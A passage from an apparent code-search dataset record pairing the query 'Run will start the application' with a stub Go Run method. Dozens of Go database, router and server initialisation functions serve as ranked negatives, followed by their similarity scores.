{\n\tvar err error\n\n\tsignKey, err = ioutil.ReadFile(privKeyPath)\n\tif err != nil {\n\t\tlog.Fatal(\"Error reading private key\")\n\t\treturn\n\t}\n\n\tverifyKey, err = ioutil.ReadFile(pubKeyPath)\n\tif err != nil {\n\t\tlog.Fatal(\"Error reading private key\")\n\t\treturn\n\t}\n\n\t// set up DB\n\tsession, err = mgo.Dial(\"localhost\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tsession.SetSafe(&mgo.Safe{})\n\n\tuserDB = session.DB(\"Theseus\").C(\"users\")\n\tfileDB = session.DB(\"Theseus\").C(\"files\")\n\tfs = http.FileServer(http.Dir(\"client\"))\n\thttp.HandleFunc(\"/\", routeHandler)\n}", "func init() {\n\tctx, _ := context.WithTimeout(context.Background(), 10*time.Second)\n\tclient, err := mongo.Connect(ctx, options.Client().ApplyURI(CONNECTIONSTRING))\n\n\tif err != nil {\n\t\tlog.Fatal(\"[init]: %s\\n\", err)\n\t}\n\t// Collection types can be used to access the database\n\tdb = client.Database(DBNAME)\n\n}", "func (ua *App) Initialize(ev *enliven.Enliven) {\n\tif !ev.MiddlewareInstalled(\"session\") {\n\t\tpanic(\"The User app requires Session middleware to be registered.\")\n\t}\n\tif !ev.AppInstalled(\"default_database\") {\n\t\tpanic(\"The User app requires that the Database app is initialized with a default connection.\")\n\t}\n\n\tvar conf = config.Config{\n\t\t\"user_login_route\": \"/user/login/\",\n\t\t\"user_logout_route\": \"/user/logout/\",\n\t\t\"user_register_route\": \"/user/register/\",\n\t\t\"user_verify_route\": \"/user/verify/{code}/\",\n\t\t\"user_forgot_password_route\": \"/user/forgot-password/\",\n\t\t\"user_password_reset_route\": \"/user/reset-password/{code}\",\n\t\t\"user_profile_route\": \"/user/profile/\",\n\n\t\t// Where the user will be redirected after these successful actions\n\t\t\"user_login_redirect\": \"/\",\n\t\t\"user_logout_redirect\": \"/\",\n\t\t\"user_register_redirect\": \"/user/login/\",\n\t\t\"user_password_reset_redirect\": \"/user/login/\",\n\t\t\"user_profile_redirect\": \"/user/profile/\",\n\n\t\t\"user_default_group\": \"Member\",\n\t\t\"user_require_verification\": \"1\",\n\t}\n\n\tconf = config.UpdateConfig(config.MergeConfig(conf, config.GetConfig()))\n\n\tdb := database.GetDatabase()\n\n\t// Migrating the user tables\n\tdb.AutoMigrate(&Permission{}, &Group{}, &User{})\n\tua.initDefaultUserModels(db)\n\n\t// Routing setup\n\tev.AddRoute(conf[\"user_login_route\"], LoginGetHandler, \"GET\")\n\tev.AddRoute(conf[\"user_login_route\"], LoginPostHandler, \"POST\")\n\tev.AddRoute(conf[\"user_register_route\"], RegisterGetHandler, \"GET\")\n\tev.AddRoute(conf[\"user_register_route\"], RegisterPostHandler, \"POST\")\n\tev.AddRoute(conf[\"user_profile_route\"], ProfileGetHandler, \"GET\")\n\tev.AddRoute(conf[\"user_profile_route\"], ProfilePostHandler, \"POST\")\n\tev.AddRoute(conf[\"user_verify_route\"], VerifyHandler)\n\tev.AddRoute(conf[\"user_logout_route\"], LogoutHandler)\n\tev.AddRoute(conf[\"user_forgot_password_route\"], ForgotPasswordGetHandler, \"GET\")\n\tev.AddRoute(conf[\"user_forgot_password_route\"], ForgotPasswordPostHandler, \"POST\")\n\tev.AddRoute(conf[\"user_password_reset_route\"], PasswordResetGetHandler, \"GET\")\n\tev.AddRoute(conf[\"user_password_reset_route\"], PasswordResetPostHandler, \"POST\")\n\n\t// Handles the setup of context variables to support user session management\n\tev.AddMiddlewareFunc(SessionMiddleware)\n\n\tfor _, templateType := range []string{\"login\", \"forgot_password\", \"forgot_password_email\", \"register\", \"verify\", \"profile\", \"verify_email\"} {\n\t\tev.Core.TemplateManager.BaseTemplate.Parse(getTemplate(templateType))\n\t}\n\n\tadmin.AddResources(&User{}, &Group{}, &Permission{})\n\n\t// Setting this app as the authorizer\n\tev.Auth = ua\n}", "func DBInit(conStr string) {\n\tif db == nil {\n\t\tvar err error\n\t\tdbConnection, err := gorm.Open(\"mysql\", conStr+\"?charset=utf8&parseTime=True&loc=Local\")\n\t\t// db connection will be closed if there's no request for a while\n\t\t// which would cause 500 error when a new request comes.\n\t\t// diable pool here to avoid this problem.\n\t\tdbConnection.DB().SetMaxIdleConns(0)\n\t\tif err != nil {\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"error\": err.Error(),\n\t\t\t}).Fatal(\"Faile to create db connection pool\")\n\t\t} else {\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"message\": dbConnection.GetErrors(),\n\t\t\t\t\"db\": conStr,\n\t\t\t}).Info(\"connected to mysql\")\n\t\t}\n\t\tdb = &DB{dbConnection}\n\t}\n\tdb.dbConnect.SetLogger(log.StandardLogger())\n\t// db.Debug message will be logged be logrug with Info level\n\tdb.dbConnect.Debug().AutoMigrate(&Todo{})\n}", "func InitDBConnection() *Database {\n\thost := viper.GetString(\"db.host\")\n\tuser := viper.GetString(\"db.user\")\n\tdbname := viper.GetString(\"db.dbname\")\n\tdbConfig := fmt.Sprintf(\"host=%s user=%s dbname=%s sslmode=disable\", host, user, dbname)\n\tdb, err := gorm.Open(\"postgres\", dbConfig)\n\tif err != nil {\n\t\tpanic(fmt.Errorf(\"Failed to initiate a connection to the database: %s\", err))\n\t}\n\n\tfmt.Println(\"Migrating database\")\n\tdb.AutoMigrate(&User{}, &Organization{}, &Restaurant{}, &Menu{}, &Activity{}, &OrderItem{})\n\n\treturn &Database{db}\n}", "func Init() {\n\trouter := mux.NewRouter()\n\t// Routes consist of a path and a handler function.\n\trouter.HandleFunc(\"/v1/transaction\", transaction).Methods(http.MethodPost)\n\n\t// Bind to a port and pass our router in\n\tlog.Fatal(http.ListenAndServe(viper.GetString(config.ListeningPort), router))\n}", "func (a *App) Initialize(config *models.StartupConfiguration) {\n\ta.IP = config.DBIp\n\ta.Port = config.Port\n}", "func init() {\n\n\t// Standard routes\n\trouter.Get(\"/userteam\", GetAllUserTeams)\n\trouter.Get(\"/userteam/:id\", GetUserTeam)\n\trouter.Post(\"/userteam\", PostUserTeam)\n\trouter.Put(\"/userteam/:id\", PutUserTeam)\n\trouter.Delete(\"/userteam/:id\", DeleteUserTeam)\n}", "func InitializeDatabase(config string, log debug.Logger) {\n\tdatabaseAccess = databaseConnection{dbconfig: config, log: log}\n\tdatabaseAccess.initialize()\n}", "func init() {\n\tschemaConfig := graphql.SchemaConfig{\n\t\tQuery: rootQuery,\n\t\tMutation: rootMutation,\n\t}\n\tschema, err = graphql.NewSchema(schemaConfig)\n\tif err != nil {\n\t\tlog.Fatal(errors.Wrap(err, \"Failed to create a new schema\"))\n\t}\n\tmuxRouter.HandleFunc(\"/graphql\", graphQLHandler)\n}", "func (a *App) Initialise() {\n\ta.initialiseConfig()\n\ta.Router = mux.NewRouter()\n\ta.Client = a.initialiseDatabase()\n\ta.initialiseRoutes()\n}", "func init() {\n\tuser := \"root\"\n\tpass := \"pwpw\"\n\tname := \"itemsDB\"\n\n\tdbconf := user + \":\" + pass + \"@/\" + name\n\tconn, err := sql.Open(\"mysql\", dbconf)\n\tif err != nil {\n\t\tpanic(err.Error)\n\t}\n\tConn = conn\n}", "func Init() {\n\tvar mongoURL bytes.Buffer\n\tvar err error\n\tconfiguration := conf.Get()\n\ttemplate.Must(template.New(\"mongo_url\").Parse(`mongodb://{{.UserName}}:{{.Password}}@localhost:{{.Port}}`)).Execute(&mongoURL, configuration.Database)\n\tSession, err = mgo.Dial(mongoURL.String())\n\tif err != nil {\n\t\tgolog.Errorf(\"Database connection error: %s\", err.Error())\n\t}\n\tDatabase = Session.DB(configuration.Database.Name)\n}", "func init() {\n\tos.RemoveAll(DataPath)\n\n\tdc := DatabaseConfig{\n\t\tDataPath: DataPath,\n\t\tIndexDepth: 4,\n\t\tPayloadSize: 16,\n\t\tBucketDuration: 3600000000000,\n\t\tResolution: 60000000000,\n\t\tSegmentSize: 100000,\n\t}\n\n\tcfg := &ServerConfig{\n\t\tVerboseLogs: true,\n\t\tRemoteDebug: true,\n\t\tListenAddress: Address,\n\t\tDatabases: map[string]DatabaseConfig{\n\t\t\tDatabase: dc,\n\t\t},\n\t}\n\n\tdbs := map[string]kdb.Database{}\n\tdb, err := dbase.New(dbase.Options{\n\t\tDatabaseName: Database,\n\t\tDataPath: dc.DataPath,\n\t\tIndexDepth: dc.IndexDepth,\n\t\tPayloadSize: dc.PayloadSize,\n\t\tBucketDuration: dc.BucketDuration,\n\t\tResolution: dc.Resolution,\n\t\tSegmentSize: dc.SegmentSize,\n\t})\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdbs[\"test\"] = db\n\td = db\n\to = dc\n\n\ts = NewServer(dbs, cfg)\n\tgo s.Listen()\n\n\t// wait for the server to start\n\ttime.Sleep(time.Second * 2)\n\n\tc = NewClient(Address)\n\tif err := c.Connect(); err != nil {\n\t\tpanic(err)\n\t}\n}", "func (a *App) Initialize() {\n\terr := a.session.Open()\n\tif err != nil {\n\t\tlog.Fatalln(\"unable to connect to mongodb\")\n\t}\n\tu := mongo.NewUserService(a.session.Copy())\n\ta.server = server.NewServer(u)\n}", "func Init() {\n\tdbType := config.LoadEnv(\"DB_CONNECTION\")\n\tvar connectionString string\n\n\tif dbType == \"mysql\" {\n\t\tconnectionString = fmt.Sprintf(\n\t\t\t\"%s:%s@(%s)/%s?charset=utf8mb4&parseTime=True&loc=Local\",\n\t\t\tconfig.LoadEnv(\"DB_USERNAME\"), config.LoadEnv(\"DB_PASSWORD\"), config.LoadEnv(\"DB_HOST\"), config.LoadEnv(\"DB_NAME\"))\n\t} else if dbType == \"postgres\" {\n\t\tconnectionString = fmt.Sprintf(\n\t\t\t\"host=%s port=%s user=%s dbname=%s sslmode=disable password=%s\",\n\t\t\tconfig.LoadEnv(\"DB_HOST\"), config.LoadEnv(\"DB_PORT\"), config.LoadEnv(\"DB_USERNAME\"), config.LoadEnv(\"DB_NAME\"), config.LoadEnv(\"DB_PASSWORD\"))\n\t}\n\n\tdb, err = gorm.Open(dbType, connectionString)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t}\n}", "func (r *RavelDatabase) Init(path string) error {\n\tvar err error\n\n\toptions := badger.DefaultOptions(path)\n\toptions.Logger = nil\n\toptions.SyncWrites = true\n\n\tr.Conn, err = badger.Open(options)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func DBInit() {\n\t// Mode = \"PRODUCTION\"\n\t// if Mode == \"PRODUCTION\" {\n\t// \tDatabaseURL = \"test.sqlite3\"\n\t// \tDatabaseName = \"sqlite3\"\n\t// } else if Mode == \"DEPLOY\" {\n\tDatabaseURL = os.Getenv(\"DATABASE_URL\")\n\tDatabaseName = \"postgres\"\n\t// }\n\n\tdb, err := gorm.Open(DatabaseName, DatabaseURL)\n\tif err != nil {\n\t\tpanic(\"We can't open database!(dbInit)\")\n\t}\n\t//残りのモデルはまだ入れてない。\n\tdb.AutoMigrate(&model.Post{})\n\tdb.AutoMigrate(&model.User{})\n\tdb.AutoMigrate(&model.Room{})\n\tdefer db.Close()\n}", "func Init(mongoclient *mongo.Client, mongostore *mongostore.MongoStore, apiclient *grpc.ClientConn) *mux.Router {\n\tclient = mongoclient\n\tstore = mongostore\n\tapiClient = apiclient\n\n\terr := initTemplates()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\trouter = initRouter()\n\n\t// seed roles\n\terr = roleSeed()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// seed routes\n\terr = routeSeed()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn router\n}", "func (db *Database) init() (*gorm.DB, error) {\n\tvar connection, err = gorm.Open(db.Driver, db.getURI())\n\tif err != nil {\n\t\tfmt.Printf(\"✖ Cannot connect to %s database\\n\", db.Driver)\n\t\tlog.Fatal(\"This is the error:\", err)\n\t} else {\n\t\tfmt.Printf(\"⚡ We are connected to the %s database\\n\", db.Driver)\n\t}\n\treturn connection, err\n}", "func (app *App) Initialize() {\r\n\tapp.Router = mux.NewRouter()\r\n\tapp.initializeRoutes()\r\n}", "func (a *App) Initialize() {\n\ta.Router = mux.NewRouter()\n\ta.setRouters()\n\ta.Clientset = k8manager.Initialize()\n}", "func (a *App) InitRoutes() {\n\ta.Router = mux.NewRouter()\n\n\tsrv := handler.NewDefaultServer(generated.NewExecutableSchema(generated.Config{Resolvers: &graph.Resolver{Service: a.Service}}))\n\ta.Router.Handle(\"/playground\", playground.Handler(\"GoNeo4jGql GraphQL playground\", \"/movies\"))\n\ta.Router.Handle(\"/movies\", srv)\n}", "func init() {\n\tdao.Server = \"mongodb://shivam:[email protected]:25294/shayona-store\"\n\tdao.Database = \"shayona-store\"\n\tdao.Connect()\n}", "func (m *SiteSearchTagsDAO) Initialize(mclient *mongo.Client, config *config.AppConfig) error {\n\n\terr := mclient.Ping(context.TODO(), nil)\n\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"Error connecting to mongodb\")\n\t}\n\n\t//log.Info().Msg(\"MediaTagsDAO connected successfully to mongodb\")\n\n\tm.DBClient = mclient\n\tm.Config = config\n\n\treturn nil\n}", "func init() {\n\tcfg = pkg.InitializeConfig()\n\t_, err := pkg.InitializeDb()\n\tif err != nil {\n\t\tpanic(\"failed to initialize db connection : \" + err.Error())\n\t}\n}", "func Init(debug bool) {\n\t// Connect to the database\n\tInitDB(debug)\n}", "func Init() {\n\tcreateDB(\"backendtest\")\n\tuseDB(\"backendtest\")\n\tCreateUserTable()\n\tCreateEventTable()\n\tCreateAddFriendTable()\n}", "func (c *FwRouter) Initialize(con util.XapiClient) {\n\tc.con = con\n\tc.ns = namespace.New(singular, plural, con)\n}", "func (programRepo *mockProgramRepo) Initialize(ctx context.Context, db *sql.DB) {}", "func InitRoutes(db *sql.DB, cnf config.Config) *mux.Router {\n\trouter := mux.NewRouter()\n\trouter = setRESTRoutes(db, cnf, router)\n\trouter = setIPCRoutes(db, cnf, router)\n\treturn router\n}", "func InitDatabase() *Database {\n\t// eg. \"postgres://postgres:postgres@localhost/postgres?sslmode=disable\"\n\t// TODO: enable SSL on DB\n\tconn, err := sql.Open(\"postgres\", os.Getenv(\"PG_CONNECTION_STRING\"))\n\tif err != nil {\n\t\tlog.Fatal(err) // kill server if we can't use DB on startup\n\t}\n\treturn &Database{\n\t\tconn: conn,\n\t}\n}", "func (server *Server) InitialiseRoutes() {\n\tserver.router = mux.NewRouter().StrictSlash(true)\n\tserver.router.Handle(\"/\", appHandler(server.hello))\n\tserver.router.Handle(\"/runs\", appHandler(server.createRun)).Methods(\"POST\")\n\n\trunRouter := server.router.PathPrefix(\"/runs/{id}\").Subrouter()\n\trunRouter.Handle(\"/app\", appHandler(server.getApp)).Methods(\"GET\")\n\trunRouter.Handle(\"/app\", appHandler(server.putApp)).Methods(\"PUT\")\n\trunRouter.Handle(\"/cache\", appHandler(server.getCache)).Methods(\"GET\")\n\trunRouter.Handle(\"/cache\", appHandler(server.putCache)).Methods(\"PUT\")\n\trunRouter.Handle(\"/output\", appHandler(server.getOutput)).Methods(\"GET\")\n\trunRouter.Handle(\"/output\", appHandler(server.putOutput)).Methods(\"PUT\")\n\trunRouter.Handle(\"/exit-data\", appHandler(server.getExitData)).Methods(\"GET\")\n\trunRouter.Handle(\"/start\", appHandler(server.startRun)).Methods(\"POST\")\n\trunRouter.Handle(\"/events\", appHandler(server.getEvents)).Methods(\"GET\")\n\trunRouter.Handle(\"/events\", appHandler(server.createEvent)).Methods(\"POST\")\n\trunRouter.Handle(\"\", appHandler(server.delete)).Methods(\"DELETE\")\n\tserver.router.Use(server.recordTraffic)\n\trunRouter.Use(server.checkRunCreated)\n\tserver.router.Use(logRequests)\n}", "func (service *Service) Initialize(ctx context.Context) error {\n\thandleErr(service.openSQLDBConnections(ctx))\n\thandleErr(service.openRedisConnections(ctx))\n\thandleErr(service.openExternalConnections(ctx))\n\thandleErr(service.initGRPC(ctx))\n\treturn nil\n}", "func (a *WsApp) Initialize(pg *pgx.Conn) {\n\n\ta.DB = pg\n\n\tchannel := \"address_notify\"\n\terr := a.DB.Listen(channel)\n\tif err != nil {\n\t\tlog.Fatalf(\"Cannot subscribe on the %s channel, %v\", channel, err)\n\t}\n\n\tchannel = \"blocks_notify\"\n\terr = a.DB.Listen(channel)\n\tif err != nil {\n\t\tlog.Fatalf(\"Cannot subscribe on the %s channel, %v\", channel, err)\n\t}\n}", "func (announceRepo *mockAnnounceRepo) Initialize(ctx context.Context, db *sql.DB) {}", "func init() {\n\n\tvar err error\n db, err = sql.Open(\"postgres\",\"user=snake dbname=snake_game sslmode=disable port=26257\")\n\t\n\tif err != nil {\n\t\tlog.Fatal(\"error connecting to the database: \", err, nil)\n\t}\n\n if err != nil {\n\t\tlog.Fatal(\"error connecting to the database: \", err, nil)\n\t}\n}", "func InitDatabase() *Server {\n\tvar err error\n\n\tconnString := getConnString()\n\n\tlog.Printf(\"Setting connection to db with configuration: %s \\n\", connString)\n\n\tserver := &Server{}\n\tserver.db, err = sql.Open(\"sqlserver\", connString)\n\tif err != nil {\n\t\tlog.Fatal(\"Error opening connection: \", err.Error())\n\t}\n\n\tserver.db.SetConnMaxLifetime(time.Minute * 4)\n\n\treturn server\n}", "func Initialize() error {\n\tsugar.Debug(\"Initialize\")\n\tif nil != DB {\n\t\tDB.Close()\n\t\tDB = nil\n\t}\n\tif err := removeDatabase(); err != nil {\n\t\treturn err\n\t}\n\treturn ConnectDB()\n}", "func init() {\n\tvar err error\n\tDB, err = gorm.Open(config.MysqlConf.DriverName, config.MysqlConf.Conn)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tDB.DB().SetMaxOpenConns(config.MysqlConf.MaxOpenConns)\n\tDB.DB().SetMaxIdleConns(config.MysqlConf.MaxIdleConns)\n\tDB.DB().SetConnMaxLifetime(time.Duration(config.MysqlConf.ConnMaxLifetime))\n\t//DB.LogMode(true)\n}", "func Init() {\n\tc := config.GetConfig()\n\n\tdb, err = gorm.Open(\"postgres\", \"host=\"+c.GetString(\"db.host\")+\" user=\"+c.GetString(\"db.user\")+\" dbname=\"+c.GetString(\"db.dbname\")+\" sslmode=disable password=\"+c.GetString(\"db.password\"))\n\tif err != nil {\n\t\tpanic(\"failed to connect database : \" + err.Error())\n\t}\n\n\tdb.Exec(\"CREATE EXTENSION IF NOT EXISTS \\\"uuid-ossp\\\";\")\n\n\tdb.AutoMigrate(&models.SendTemplate{}, &models.SmsTemplate{}, &models.User{})\n\n\tdb.Model(&models.SmsTemplate{}).AddForeignKey(\"user_id\", \"users(id)\", \"RESTRICT\", \"RESTRICT\")\n\tdb.Model(&models.SendTemplate{}).AddForeignKey(\"sms_template_id\", \"sms_templates(id)\", \"RESTRICT\", \"RESTRICT\")\n}", "func Initialize(mongo *mongo.Client, opts ...*DBOptions) {\n\tdbManager = &DBManager{}\n\toptions := &DBOptions{}\n\n\tif len(opts) == 0 {\n\t\toptions.databaseName = \"Cryb\"\n\t\toptions.userCollection = \"Users\"\n\t\toptions.portalCollection = \"Portals\"\n\t\toptions.roomCollection = \"Rooms\"\n\t\toptions.messageCollection = \"Messages\"\n\t} else {\n\t\toptions = opts[0]\n\n\t\tif options.databaseName == \"\" {\n\t\t\toptions.databaseName = \"Cryb\"\n\t\t}\n\t\tif options.userCollection == \"\" {\n\t\t\toptions.userCollection = \"Users\"\n\t\t}\n\t\tif options.portalCollection == \"\" {\n\t\t\toptions.portalCollection = \"Portals\"\n\t\t}\n\t\tif options.roomCollection == \"\" {\n\t\t\toptions.roomCollection = \"Rooms\"\n\t\t}\n\t\tif options.messageCollection == \"\" {\n\t\t\toptions.messageCollection = \"Messages\"\n\t\t}\n\t}\n\n\tdbManager.database = mongo.Database(options.databaseName)\n\tdbManager.userCollection = dbManager.database.Collection(options.userCollection)\n\tdbManager.portalCollection = dbManager.database.Collection(options.portalCollection)\n\tdbManager.roomCollection = dbManager.database.Collection(options.roomCollection)\n\tdbManager.messageCollection = dbManager.database.Collection(options.messageCollection)\n\n\tpackageReady = true\n}", "func (locationRepo *mockLocationRepo) Initialize(ctx context.Context, db *sql.DB) {}", "func init() {\n\tdbinfo := fmt.Sprintf(\"user=%s password=%s dbname=%s sslmode=disable\",\n\t\tos.Getenv(\"POSTGRES_USER\"), os.Getenv(\"POSTGRES_PASSWORD\"), DATABASE_NAME)\n\tdb, err := sql.Open(\"postgres\", dbinfo)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tDB = db\n}", "func (a *App) Initialize() {\n\tlog.SetFlags(log.LstdFlags | log.Lshortfile)\n\ta.Router = mux.NewRouter()\n\ta.MiddleWares = &MiddleWare{}\n\ta.initializeRoutes()\n}", "func Init(d *db.Database, c config.Config) *Server {\n\tr := mux.NewRouter()\n\th := &http.Server{\n\t\tHandler: r,\n\t\tAddr: c.Web.Addr,\n\t\tWriteTimeout: 15 * time.Second,\n\t\tReadTimeout: 15 * time.Second,\n\t}\n\tsrv := &Server{\n\t\tDB: d,\n\t\trouter: r,\n\t\tHS: h,\n\t\tConfig: c,\n\t}\n\treturn srv\n}", "func init() {\n\tdbconn, err := database.NewPostgreDB(dbType, connStr)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsesconn, err := database.NewRedisCache(addr, pass)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tconfig.dbconn = dbconn\n\tconfig.sessionconn = sesconn\n}", "func Initialize() {\n\tconnection := os.Getenv(\"DB_HOST\")\n\tusername := os.Getenv(\"MYSQLUSER\")\n\tpassword := os.Getenv(\"MYSQLPASS\")\n\n\tfor {\n\t\tconn, err := net.DialTimeout(\"tcp\", connection, 6*time.Second)\n\t\tif conn != nil {\n\t\t\tconn.Close()\n\t\t\tbreak\n\t\t}\n\n\t\tlogrus.Info(\"Sleeping till mysql be available... \", err)\n\t\ttime.Sleep(5 * time.Second)\n\t}\n\n\tdb, err := sql.Open(\"mysql\", \"\"+username+\":\"+password+\"@tcp(\"+connection+\")/zinnion?charset=utf8\")\n\tif err != nil {\n\t\tlogrus.Info(\"No connection with mysql, \", err)\n\t}\n\tMysqlClient = db\n}", "func InitializeRouter(s *config.Server) {\n\tr := &Router{\n\t\tRouter: mux.NewRouter(),\n\t\tServer: s,\n\t}\n\n\tinitializeUserRoutes(r)\n\n\tlog.Fatal(http.ListenAndServe(\":8080\", r.Router))\n}", "func (s *Server) InitRoutes() {\n\ts.Router.GET(\"/ingredients\", s.AllIngredients)\n\ts.Router.POST(\"/ingredients\", s.NewIngredient)\n\ts.Router.GET(\"/ingredients/:id\", s.GetIngredient)\n\n\ts.Router.GET(\"/ingredients/:id/relations\", s.GetIngredientRelations)\n\ts.Router.DELETE(\"/ingredients/:id\", s.DeleteIngredient)\n\n\ts.Router.GET(\"/categories\", s.AllCategories)\n\ts.Router.POST(\"/categories\", s.NewCategory)\n\ts.Router.DELETE(\"/categories/:id\", s.DeleteCategory)\n\n\ts.Router.GET(\"/utensils\", s.AllUtensils)\n\ts.Router.POST(\"/utensils\", s.NewUtensil)\n\ts.Router.DELETE(\"/utensils/:id\", s.DeleteUtensil)\n\n\ts.Router.GET(\"/measures\", s.AllMeasures)\n\n\ts.Router.POST(\"/recipes\", s.NewRecipe)\n\ts.Router.GET(\"/recipes\", s.SearchRecipe)\n\ts.Router.GET(\"/recipes/:id\", s.RecipeById)\n\ts.Router.PUT(\"/recipes/:id\", s.UpdateRecipe)\n\ts.Router.DELETE(\"/recipes/:id\", s.DeleteRecipe)\n\n\ts.Router.POST(\"/recipes/images\", s.UploadImages)\n\n\ts.Router.GET(\"/live\", s.Live)\n}", "func Initialize() common.Router {\n\tportNumber := \"9000\"\n\n\t//CORS\n\tcorsConfig := cors.DefaultConfig()\n\tcorsConfig.AllowOrigins = whiteList\n\tcorsConfig.AllowMethods = allowMethods\n\tcorsConfig.AllowHeaders = allowHeaders\n\tcorsConfig.AllowCredentials = true\n\n\treturn common.Router{\n\t\tEngine: gin.Default(),\n\t\tPort: portNumber,\n\t}\n}", "func init() {\n\trouter().GET(\"/ping\", pingHandler)\n}", "func init() {\n\t//orm.RegisterDriver(\"mysql\", orm.DRMySQL)\n\n\tmysqlReg := beego.AppConfig.String(\"mysqluser\") + \":\" +\n\t\tbeego.AppConfig.String(\"mysqlpass\") + \"@tcp(127.0.0.1:3306)/\" +\n\t\tbeego.AppConfig.String(\"mysqldb\") + \"?charset=utf8&parseTime=true&loc=Australia%2FSydney\"\n\torm.RegisterDataBase(\"default\", \"mysql\", mysqlReg)\n}", "func init() {\n\t// db, err := sql.Open(\"mysql\", mysql_connect)\n\t// if err != nil {\n\t// \tlog.Fatal(err)\n\t// } else {\n\t// \tlog.Println(\"Successfully connected to mysql database\")\n\t// }\n\t// defer db.Close()\n\n}", "func init() {\n\tlog.DebugMode = cuxs.IsDebug()\n\tlog.Log = log.New()\n\n\tif e := cuxs.DbSetup(); e != nil {\n\t\tpanic(e)\n\t}\n}", "func (a *App) Init() {\n\tvar connectionString = \"user:password@tcp(127.0.0.1:3306)/sports_betting_db\"\n\targs := os.Args[1:]\n\tif len(args) > 0 {\n\t\tconnectionString = args[0]\n\t}\n\ta.BetsRepo = betsrepo.NewMysqlRepo(connectionString)\n\ta.Validator = validator.New()\n\ta.Router = chi.NewRouter()\n\ta.initializeRoutes()\n}", "func (s *Server) initializeRoutes() {\n\n\t// Home Route\n\ts.Router.HandleFunc(\"/\", middlewares.SetMiddlewareJSON(s.Home)).Methods(\"GET\")\n\n\ts.Router.HandleFunc(\"/products\", middlewares.SetMiddlewareJSON(s.FindAllProducts)).Methods(\"GET\")\n\ts.Router.HandleFunc(\"/product\", middlewares.SetMiddlewareJSON(s.CreateProduct)).Methods(\"POST\")\n\ts.Router.HandleFunc(\"/product/{id:[0-9]+}\", middlewares.SetMiddlewareJSON(s.GetProduct)).Methods(\"GET\")\n\ts.Router.HandleFunc(\"/product/{id:[0-9]+}\", middlewares.SetMiddlewareJSON(s.UpdateProduct)).Methods(\"PUT\")\n\ts.Router.HandleFunc(\"/product/{id:[0-9]+}\", middlewares.SetMiddlewareJSON(s.DeleteProduct)).Methods(\"DELETE\")\n}", "func (goservice *GoService) Initialize() {\n\tgoservice.Router = mux.NewRouter()\n\n\tgoservice.Router.HandleFunc(\"/health\", goservice.healthCheckHandler)\n\tgoservice.Router.Handle(\"/metrics\", promhttp.Handler())\n\n\tgoservice.Router.HandleFunc(\"/api/v1/event\", goservice.PostCreate).Methods(\"POST\")\n\tgoservice.Router.HandleFunc(\"/api/v1/event\", goservice.GetAll).Methods(\"GET\")\n\tgoservice.Router.HandleFunc(\"/api/v1/event/{id}\", goservice.GetByID).Methods(\"GET\")\n\n\tgoservice.Router.PathPrefix(\"/debug/\").Handler(http.DefaultServeMux)\n\n\tgoservice.Router.Use(loggingMiddleware)\n\tgoservice.Router.Use(goservice.authMiddleware)\n\n\tvar appconfig ConfigParameters = handleConfiguration()\n\tgoservice.Config = &appconfig\n}", "func Init() {\n\tr := router()\n\tr.Run(\":3001\")\n}", "func Init() {\n\tlog.Info(\"Init mongodb instance....\")\n\tclientOptions := options.Client().ApplyURI(connectionString)\n\tclient, err := mongo.Connect(context.TODO(), clientOptions)\n\n\tif err != nil {\n\t\tlog.Error(err.Error())\n\t\treturn\n\t}\n\n\tlog.Info(\"Init mongodb done...\")\n\tdatabase := client.Database(dbName)\n\tusersCollection = database.Collection(\"users\")\n\tproductsCollection = database.Collection(\"products\")\n\tcategoriesCollection = database.Collection(\"categories\")\n\ttestCollection = database.Collection(\"test\")\n}" ]
[ "0.7584453", "0.75465846", "0.7507653", "0.74276567", "0.7385693", "0.7308852", "0.7270049", "0.7269961", "0.7269961", "0.71667546", "0.71504784", "0.71273017", "0.70464236", "0.7006716", "0.6994363", "0.6990787", "0.6919952", "0.68893766", "0.6831192", "0.6829179", "0.67651004", "0.67358905", "0.67140603", "0.6709692", "0.66940063", "0.6657589", "0.6646916", "0.6635729", "0.6634861", "0.66322684", "0.66192573", "0.661232", "0.6602029", "0.65698147", "0.65586245", "0.65342885", "0.6516996", "0.64921355", "0.6482929", "0.64536136", "0.64383024", "0.6414376", "0.641317", "0.64065176", "0.6393308", "0.63798475", "0.63760924", "0.6374439", "0.6360813", "0.63591325", "0.6355499", "0.63552123", "0.6349662", "0.6348678", "0.63467747", "0.6341072", "0.6340196", "0.6319061", "0.6317488", "0.6317081", "0.63157016", "0.6303498", "0.62785894", "0.62690014", "0.62559515", "0.62556887", "0.6250546", "0.624879", "0.6247159", "0.62460554", "0.6240881", "0.62284034", "0.6228323", "0.6222755", "0.62211174", "0.6214182", "0.6209097", "0.6195432", "0.6194221", "0.6194003", "0.6191376", "0.61910146", "0.6183355", "0.61825037", "0.6179881", "0.6175962", "0.616994", "0.6167048", "0.61622554", "0.6160384", "0.61566585", "0.61531985", "0.6150615", "0.61333567", "0.61298925", "0.6125228", "0.6121413", "0.6117536", "0.6116832", "0.61123586" ]
0.767754
0
Run will start the application
func (app *App) Run(addr string) {}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
